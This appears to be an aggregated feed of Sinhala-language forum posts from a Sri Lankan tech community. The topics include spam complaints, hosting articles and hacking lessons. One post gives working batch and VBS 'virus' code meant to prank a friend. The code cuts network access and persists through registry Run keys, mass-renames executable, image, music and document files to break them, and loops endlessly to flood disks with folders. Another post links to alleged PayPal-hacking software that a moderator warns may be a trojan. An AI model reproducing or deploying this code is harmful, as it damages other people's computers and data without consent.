Quantcast
Channel: නව සාකච්ඡාවන් - එකතුව.lk
Viewing all 3679 articles
Browse latest View live

Windows 8.1 Activator එක දෙනවද


Ikman IT lk domain එක සති දෙකක් ඇතුලත lk Rank වල ඉදිරියට

අසහනකාරයෙක්ගේ වැඩක් !

$
0
0
දැන් දවස් ගානක් තිස්සෙ එකතුවට ස්පෑම්,අසභ්‍ය එකතු කරමින් එකතුව වනසන්න යම්කිසි පුද්ගලයෙක් ලොකු උත්සාහයක් ගන්නවා :( . අපි නම් දන්නවා මේක ඉරිසියාවට කරන වැඩක් කියලා :malamsunyi . තව ටික දවසක් යනකොට හරියටම හොයාගන්න පුලුවන් වේවි කවුද මේක කරන අසහනකාරයා කියලා. කොහොම උනත් එයා ගොඩක් මහන්සි වෙලා තියෙනවා එකතුවේ ස්පෑම් දාන්න. මම නම් එයාට කියන්නෙ ඔය ඊමේල් හදන වෙලාවයි මේකෙ ෆේක් අකවුන්ට් හදන වෙලාවයි වැදගත් දේකට යොමු කරන්න කියලා. ඔයා ඔය කරන වැඩෙන් ඔයාගේ වෙලාවයි මේකට එන අනිත් අයගේ වෙලාවයි දෙකම අපරාදේ.. :stalker

මම මේකෙ ඇඩ්මින් කෙනෙක් විදිහට අපේ සාමාජිකයන්ට දෙන දැනුම් දීම තමයි ඔය කුනුහරප දාලාගෙන එන අයත් එකක් පැටලෙන්න යන්න එපා. අදාල නැති දෙයක් නම් මගහැරලා යන්න. අපි ඉස්සරහට ස්පැම් දාන අයට ඒ වැඩේ තව ටිකක් අමාරු කරනවා. මේ සතිය ඇතුලත එකතුවේ තව පොඩි පොඩි වෙනස්කම් කිහිපයක් කරන්න බලාපොරොත්තු වෙනවා. ඊට පස්සෙ ස්පෑම් අයියලාගේ වැඩ අඩු වේවි :beautiful . අපේ සාමාජිකයෝ ටික මොන දේ උනත් එකතුවත් එක්ක ඉන්නවා කියලා අපි දන්නවා :sukses . ඒත් එක්කම පහුගිය දවස් ටිකේ ස්පෑම් වලින් කරදර උන අයට බලවත් කනගාටුව ප්‍රකාශ කරනවා.

ඇඩ්මින් කොන්ද පන නැති ඌරෙක්

$
0
0
කොන්ද පන තියෙනවනම් මකපු පෝස්ට් ටික ආයේ දාපන්

කොහොමද අපි PTC site එකක් scam ද කියල හොයා ගන්නේ

$
0
0
කොහොමද අපි PTC site එකක් scam ද කියල හොයා ගන්නේ,දන්න කෙනෙක් උදව් කරනවද?

Blackhatworld.com අකවුන්ට් එකක් තියනවද? පුන්චි වෑඩකට $1 ගානෙ දෙනවා

$
0
0
Thiyanawanm kiyanna. Maasa 3k wath parana posts 20+ wath thiyanawanam kiyanna :)

blog aulak

Windows vps $2.80 Only ඉක්මන් කරන්න

$
0
0
Windows Vps

Virtual Server Specs:

40GB Hdd
1 Vcpu
1GB Ram
100Mb/s Unmetered
Windows 2008R2 Trial 30 Days
Location Europe

We do not allow:
------------------------------
Mass Emailing
Torrent
DDos Attacks
Bit coin Mining
Any Illegal Activity
High Resource I/O Usage Software
Scraping Without Using Private Proxies

ඕන කට්ටිය Inbox එන්න :)

PFD doc ekak PDF/A walin open karanne kohomada,

$
0
0
Meka karana eka vidihak man dannawa, mata ona pdf/a walin auto open karanna,

HaCkInG Lesson 2 (Using Payload and listner)

$
0
0
\:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/ \:D/

ඔන්න එහෙනම් මම කිව්වා වගේම hacking lesson එකක් අරගෙන ආව.......
මම මේකෙදි කියලදෙන්න හදන්නේ කොහොමද තව කෙනෙකුගේ PC එකක් ලේසියෙන්ම Hack කරලා ඒ PC එකේ control එක අපේ අතට ගන්නේ කියල.......
මම මේකට use කරන්නේ payload and listing concept එක.....

මුලින්ම කියන්න ඕන....මම කරපු 1st video tutorial එක....
එක නිසා වැරදි තියෙන්න පුළුවන්.....
ඒවගේම තමය් video quality එක....ඔයාල මේක 720p වලින් download කරගන්න...
video එකේ පෙන්නේ හරි පැහැදිලි නැති හරි තැනක් තියනවනම් අහන්න......මම code එක comment කරන්නම් නැත්තම් ඒ තැන පැහැදිලි කරලා දෙන්නම්..........

මේකේ වැරදි තියනවනම් කියන්න ඒ වැරදි හදාගෙන ඊලග video එක දැන්නම්.....

image

>:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ >:/ \:D/

HaCkInG Lesson 1 පටන්ගමු එහෙනම්........

$
0
0

Hacking ඉගෙන ගන්නවනම්

image
1.) Hacking Tools Install කරන්න vertual maching එකක් Install කරගන්න....

2.) vertual maching විදියට vmware හරි oracal vm හරි Install කරගන්න......
a. vmware download... කරගන්න මෙතනින්.... http://adf.ly/rM3hz හෝ
b. oracal vm download... කරගන්න මෙතනින්... adf.ly/rM2MT

c. Kali Linux download... කරගන්න මෙතනින්...adf.ly/rM7Z1


3.) මගේ ගාව තියෙන්නෙ oracal vm මම එකෙන් පෙන්නන්නම් කරන විදිය....

4.) vmware install කරගන්න සාමන්‍ය software install කරන විදියට.....

5.) vmware එකට BackTrack / Kali Linux Install කරන්න මේ video එක බලන්න.....
video 1. = https://www.youtube.com/watch?v=128qWlHIZHk

6.) vertual විදියට tools පාවිච්චි කරන්න....නැත්තම් අපිව HACK වෙලා තියෙය් අපි
දන්නෙම නැතුව.........

Kali Linux කියන්නෙ Backtrack වල අලුත් version එක.......
image

අව්ලක් වුනොත් අහන්න ඕනම දෙයක් ගෙන.....මම help එකක් දෙන්නම්...

මම Next Post එකෙන් කියල දෙන්නම් BackTrack / Kali Linux වලින් computer hacking(ip hacking) / gmail phishing / FB phishing / wifi hacking වගේ ඒව කරන විදිය....

Screen Shots නැති එකට Sorry සහෝ......මේ දවස් වල හුගක් වැඩ......එකය්.....

PAIDVERTS වලින් නිවැරදිව හම්බකරමු (උපුටා ගැනීමකි )

නොමිලේ UNLIMITED WEB HOSTING මේ මැයි මාසේ

$
0
0
image

අලුතෙන් වෙබ් අඩවියක් පටන් ගන්න ඉන්න අයට​. එකක් හොයන අයට මෙන්න නියම අවස්තාවක්.
මේ මැයි මාසේ LankaiHost එකේ UNLIMITED BASIC සහ UNLIMITED PRO පැකේජයන් මිලදීගන්න ඔයාලට 100% වට්ටම් දැන් ලැබෙනවා.! දැන්ම ගන්න​.!
Promo Code: VRLLXYC66V
**සැගවුනු ගාස්තු සහ කොන්දේසි කිසිම දෙයක් නැ.
www.lankaihost.com වෙත පිවිසෙන්න​

මෙහෙමත් paypal වලට attack කරන්න පුලුවන්ද?

$
0
0
මචන් යාලුවනේ Internet එකේ රවුම් ගහනකොට දෑකල තමයි.මේ software එක හම්බුනේ....අනේ මන්දා මේක ඈත්තද කියන්න නම් දන්නේ නෑ..හෑබෑයි ඈත්ත වගේ..ඔයාල හෑමොම දන්න...clicksence/neobux වගේ සල්ලි උපයන web sites වලට වගේම,paypal / payza / payoneer වෑනි internet bank ත් හෑක් කරන්න පුලුවන් software එකක් වගේ....


මේ තියෙන link එකෙන් ගිහින් බාගෙන බලපන්කො..https://my.pcloud.com/publink/show?code=XZb4WXZdudcHmJBXxfYyiSdcAHtY7U9Agy0

ඒත් ඉතින් මේකකරන හෑටි දන්නේ නෑති නිසා...මම youtube එකේ ගහල බෑලුවම මෙ vedio එක ලෑබුනා ඔයාලත් බලන්නකො
https://youtube.com/watch?v=T5--5XZLkPk

බලපන්කො,paypal / payza / payoneer වගේ highly secur තියෙන internet bank එකකටත් මෙහෙම පොඩි software කෑල්ලකින් attack කරන්න පුලුවන්ද කියල විස්වස කරන්නත් අමරුයි...
හොදම වෑඩේ මොකක්ද දන්නවද්? මාත් ඉතින් try කරල බලන්න වෑඩේ කරල බෑලුව..බාගයක් දුර යද්දි මෙන්න බොලේ එක activation key ඉල්ලනවා..මලේ මල...

activation key එකත් දන්නවනම් දාන්න හොදේ
මේක කරන එක දන්න කෙනෙක් ඉන්නවනම් කියනවද..ඒවගෙම මේක ගෑන විස්තර මීටවඩා දන්න කෙනෙක් ඉන්නවනම් දාන්න අපි කටත් දෑනගෑනීම පිනිස

================================
Moderator warning: අවවාදයයි, මෙවැනි ඇප්ලිකේෂන් Trojan host ලෙසින් හැසිරිවීමේ හැකියාව ඇති බැවින් කරුණාකර බාගත කිරීමෙන් පසු ප්‍රතිවෛරස මෘදුකාංගයක් මගින් පිරික්සාගන්න

Ethical Hacking මුලසිට ඉගෙන ගමුද?????? STEP BY STEP @ home

$
0
0
කොහොමද සහෝදරවරැනි.... හෙට මැයි දිනේ නෙ... හම් අගහරැවාදා තමයි මම UK ඉදන් ආවෙ... ඉතින් මම ඔයාලට අලුත් දෙයක් ගේන්න හිතුවා.. කැමති අය මේක බලල comment එකක් දාන්න...
Ethical Hacking මුලසිට ඉගෙනගන්න. http://tutorialsaga.blogspot.com/
!!!!!....එහෙනම් ජය වේවා....!!!!!!.

---------------------------------------------------------------------------------------------------------------------------------

යාළුවෙක්ට ඇඩෙන්න දෙමුද VIRUS පොඩි පාරක්........

$
0
0

....Notepad Virus Writing...ඔන්න මගේ ගානෙ පොඩි තෑග්ගක්........:)) :)) :)) :)) :)) :))

...Do Not try this codes on your computer.....


image


No Internet.....

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

යළුවගෙ Internet නැත්තටම නැතිකරන්න.....මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .bat කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න....

Change File Type.....

@echo off

ren *.exe *.txt

ren *.jpeg *.txt

ren *.mp3 *.txt

ren *.doc *.com

ren *.jpg *.txt

යළුවගෙ Files නැත්තටම නැතිකරන්න.....මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .bat කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න....

Crazy Text Maker.....

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200

Wshshell.Sendkeys “s”

Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”

WScript.Sleep 200

WshShell.SendKeys “You”

WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”

wscript.sleep 200

wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop

මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .VBS කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න..

Folderssssssssssssssss.....

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################

එපා වෙනකන් Folders හදන්න...මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .VBS කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න..

...Do Not try this codes on your computer.....

blog gataluwak

$
0
0
yaluwane mata kiyanawada Random Posts blog ekata daganne kohomada kiyala

You earned a promotion to Senior Level

Networking bassic configuration ගැන සින්හලෙන්ම විඩියො අරන් අවා

$
0
0
ඔන්න ගොඩ දවසකට පස්සෙ පොස්ට් කල්ලක් අරන් අවා . ආ පොස්ට් එකක්ම නෙවෙ විඩියො එකක් .නෙට්වක් කරන අයට සින්හලෙන් Basic network configuration (cisco) කරන විදිය සින්හලෙන්ම කියල දිලා තියෙනවා . අනිව විඩ්යො 2කම් බලන්න නත්තම් වැඩක් නති වෙයි

1. how to up router
2. host name දැම්මිම
3.password දැම්මිම - privilege mode
- user mode - Telnet password
image

image

Unlimited web hosting වල ඇත්ත කථාව

$
0
0
image

මුල් ලිපිය - 119sinhala.blogspot.com/2015/05/unlimited-web-hosting.html

ලංකාවේ වෙබ් හොස්ටර්ලා බහුතරයක් අතර අහන්න දකින්න ලැබෙන කථාවක් තමයි අපි Unlimited web hosting දෙනවා කියන එක. නමුත් ඇත්තටම අන්ලිමිටඩ් දෙන්න පුළුවන් ද?

අද ලිපියෙන් අපි බලමු ඇත්තටම මේ කියන අන්ලිමිටඩ් කියන එක දෙන්න පුළුවන් ද කියලා.



මුලින්ම අපි බලමු කොහොමද වෙබ් හොස්ටින්ග් පැකේජ් එකක් හදන්නේ කියල. මේකට අපිට අවශ්‍ය වෙනවා වෙබ් සර්වර් එකක්. කොහේද මේ සර්වර් එක තියෙන්නේ. ඒ ගොඩනැගිල්ල අපි හදුන්වනවා DC/Data Center එකක් කියලා. අපි විසින් කුලියට ගත් ඉඩක අපේ පරිගණකයක් රදවනවා අපි. මේක හදුන්වන්නේ Co-location කියලා. උදාහරණයක් විදියට 1U රැක් එකක රඳවන්න පුළුවන් පරිගණකයක් අපි අරගෙන කන්ෆිගර් කරලා ඩේටා සෙන්ටර් එකේ රඳවලා තැබීම තමයි කො-ලොකේෂන් කියලා කියන්නේ.

මීලගට තියෙන්නේ අපි ඩේටා සෙන්ටර් එකේ අයිති පරිගණකයක් කුලියට ගැනීම. බොහෝවිට හොද DC එකකින් පරිගණකයක් කුලියට ගන්න මසකට $200ක්වත් අවම වැයවෙනවා. මේ දෙයාකාරයෙන් බහුලවම අපි භාවිතා කරන්නේ දෙවනි ක්‍රමය. මොකද හදිසියේවත් DC එක මාරු කරන්න අවශ්‍යතාවයක් ආවෝතින් ඉක්මනින්ම කරගන්න පුළුවන් වෙන්නේ දෙවනි ක්‍රමයේදී නිසා. අනිත් දේ අපි ලංකාවේ ක්‍රියාත්මක වෙන ආයතනයක් නිසා අපිට අදාල පරිගණක යැවීමේදී වියදම් වන මුදල හා ගුවන් ටිකට්පත් වගේ අමතර වියදම් නිසා DC එකෙන් සර්වර් එකක් කුලියට ගන්න එක බොහෝමත් ලාබයි.

නමුත් අපිට ගොඩක් කස්ටම් කන්ෆිගරේශන් කරන්න අවශ්‍ය නම් ඉතින් කො-ලොකේෂන් පහසුකම භාවිතා කරන්න වෙනවා. (ඉදිරි ලිපියකින් පැහැදිලි කරන්නම් ලංකාවේ ඇයි DC එකක් හදන්න බැරි කියලා දැනට)

මෙහෙම ගන්න පරිගණකයක් පැය 24ම අන්තර්ජාල සබදතාවයකින් සමන්විත වෙනවා වගේම පැය 24ම අවදියෙන් තැබීමත් සිදුකරනවා. ඒ වගේම IP block එකකුත් බොහෝවිට මෙම පරිගණකයට වෙන් කරලා DC එකෙන් ලබාදෙනවා.

වෙබ් හොස්ටින්ග් ලබාදෙන සමාගමක් මෙහි අදාල මෘදුකාංගයන් අන්තර්ගත කරලා, ඔවුන්ගේ පද්ධති හා සම්බන්ධ කරලා තමයි ඒ හොස්ටින්ග් පැකේජයන් සාමාන්‍ය අය අතරට ගෙනයන්නේ. දැන් හෝඩුවාවක් ලැබිලා ඇති ඇයි අන්ලිමිටඩ් දෙන්න බැරි කියලා ප්‍රායෝගිකව.

ඔව්, මේ සියල්ල වෙන්නේ අපේ නිවසේ පරිගණකය වගේම පරිගණකයකයි. (cloud hosting අදාල නොවේ) ඒ පරිගණකයේ ඇති සම්පත් වලින් අපේ හොස්ටින්ග් පැකේජය නිතරගයෙන් ලිමිට් වෙලා තියෙනවා.

උදාහරණයක් ගත්තෝතින් අපි ගෙදර භාවිතා කරන්නේ 3.0GHz සකසනයක වේගයක් සහිත පරිගණකයක් නම්, අපගේ ඕනෑම මෘදුකාගයක් මඟින් අපිට සැකසිය හැකි වේගය ඒ දෘඩාංගයේ උපරිම සීමාවෙන් සීමාවෙනවා.

ඒ වගේමයි සසම්භාවී ප්‍රෙව්ශය හා දත්ත ගබඩා කිරීමත්. ඒක නිසා ඇත්තටම මේ සර්වර් එක උඩ අන්ලිමිටඩ් දෙන්න බැහැ.

නමුත් අපිට මේ සර්වර් එක තවත් ක්ලස්ටර් හා සම්බන්ධ කරලා එහි මේ සීමාවන් ඉහල දමන්න පුළුවන් වුනත්, ක්ලස්ටර් වල තියෙන සීමාවන් නිසාත් මේ අන්ලිමිටඩ් කථාවේ සීමාවක් දකින්න ලැබෙනවා.

ඒක නිසා බොහෝමයක් අන්ලිමිටඩ් සපයනවා කියන ප්‍රධාන පෙලේ සමාගම් අපි නොදැනුවත්වම එකඟ වෙන (I accept & continue click) ඔවුන්ගේ සේවා කොන්දේසි වල පැහැදිලිවම ඇතුලත් කරලා තියෙනවා කොහොමද මේ අන්ලිමිටඩ් කියන එක ලිමිට් වෙන්නේ කියලා.

ඔබ සරල වෙබ් අඩවියක් හොස්ට් කරන්න අන්ලිමිටඩ් පැකේජයක් මිලදී ගැනීමේදී බොහෝවිට එයින් මෙගාබයිට් 50කට ආසන්න දෘඩතැටි ධාරිතාවක් හා ගිගාබයිට් කීපයකට සීමාවෙන දත්ත ප්‍රවේශ ධාරිතාවයක් තමයි මසකට භාවිතා කරන්නේ. නමුත් ඒ අතරතුරේ තවත් කෙනෙක් එම මුදලම ගෙවලා ගිගාබයිට් 20ක වගේ දෘඩ තැටි ධාරිතාවක් හා ටෙරාබයිට් එකකට ලග දත්ත ප්‍රවේශ ධාරිතාවක් භාවිතා කරනවා වෙන්න
පුළුවන්.

ඒ වගේම ව්‍යවහාරයේදී eaters යනුවෙන් හදුන්ව සේවාලාභීන් මේ අතරතුරේ උත්සහ කරනවා ගිගාබයිට් දහස් ගණනක දෘඩතැටි ධාරිතාවක් භාවිතා කරන්න. ඒ අවස්ථාවේදී අදාල සමාගම විසින් එම පුද්ගලයන්ගේ දත්ත තැන්පත්කිරීමේ සීමාවන් පණවනවා සැම දෙනාටම සාධාරණ වෙන ප්‍රමාණයකට.

නමුත් බොහෝමයක් සාමාන්‍ය සමාගම් මෙම eaters ලාව හදුන්වන්නේ ගිගාබයිට් 25ක් වගේ සුළු ප්‍රමාණයක් ඉක්මවා යන පුද්ගලයන්ට. එයට හේතුව සමාගමේ සම්පත්වල ඇති හිඟකම. මේ ආකාරයටම රැම් හා Processor ධාරිතාවයන් ද eater කරන පුද්ගලයන් සිටිනවා.

නමුත් බොහෝමයක් ලංකාවේ සමාගම් වල (විශේෂයෙන් summer host වල - summer host යනු අති විශාල ධාරිතාවයන් හා පහසුකම් ඉතාමත් අඩු මුදලට සපයන බවට පොරොන්දු වී, මුදල් ලබාගෙන සුළු කාලයකට පසු අතුරුදහන් වන සමාගම්) මෙම සාධාරණ භාවිතා ප්‍රතිපත්ති දක්නට ලැබෙන්නෙත් නැහැ. ඒත් ඔවුන්ගේ මාකටින් සිදුවෙන්නේ අන්ලිමිටඩ් ලබාදෙන බව පවසමින්.

මෙයත් සමාන වෙන්නේ SLT වෙතින් අන්ලිමිටඩ් ලබාදෙන බව පවසා ගිගාබයිට් 45කට සීමා කිරීමටයි.

එම නිසා හොස්ටින්ග් ආයතනයක් තෝරාගැනීමේදී විශේෂයන් ඔවුන් සේවා සපයන ආකාරය ගැන සැලකිලිමත් වන්න !



මුල් ලිපිය - 119sinhala.blogspot.com/2015/05/unlimited-web-hosting.html
Viewing all 3679 articles
Browse latest View live